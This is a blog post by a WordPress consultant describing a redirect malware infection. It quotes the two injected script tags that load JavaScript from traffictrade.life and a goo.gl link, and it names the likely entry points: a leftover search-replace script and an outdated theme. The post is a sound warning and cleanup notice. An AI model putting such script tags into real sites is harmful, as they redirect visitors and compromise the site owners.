Recently I’ve been contacted by several clients reporting malware on their WordPress sites which redirects pages and post to other websites. This malware code is “invisible” on the live side of the website but when you go to the edit side it will appear scattered throughout the pages and posts.
A quick look at just about any of the pages and posts has turned up these two pieces of code inserted hundreds (and in some instances thousands) of times. This means the code has been injected into one or more of your WordPress database tables.
<script src='https://traffictrade.life/scripts.js' type='text/javascript'> </script>
<script src='https://goo.gl/GgBwxB' type='text/javascript'> </script>
Google has disabled the https://goo.gl/GgBwxB url but Traffictrade continues to cause problems.
The Traffictrade infection appears to be making its way into websites in a couple of different ways:
1. A database search/replace script named searchreplacedb2.php that has been left in the root/public_html directory. They strongly advise that this script be removed when it is done being used but many people seem to be be forgetting to do so.
2. A vulnerability in older versions of the Newspaper theme that allows the traffictrade.life code to be injected in to the wp_options table.
Hosting companies typically will not assist in the removal of this code since it is a 3rd part application (WordPress). They may offer you a premium site monitoring and malware removal service which is often expensive, unnecessary and in some instances unable to address this problem.
It is very important to get this quickly and completely removed as Google will remove any pages where the code is found from their search results.
Google has detected sneaky redirects on your site. This means that your site is using technology that detects user characteristics—such as region or device—to direct the user to an unexpected page. This causes unexpected search results for Google Search users and violates our Webmaster Guidelines. Therefore, Google has prevented the offending pages from showing in search results. If you remove the sneaky redirects, our system will automatically reflect these changes as we update our index.
Please contact me if you need assistance in removing this or anything else WordPress website related.
[…] are not isolated in observing this infection. Dan Fennel wrote about this on July 24th. This is showing up on StackOverflow (July 17th). And we initially covered this on July 25th when […]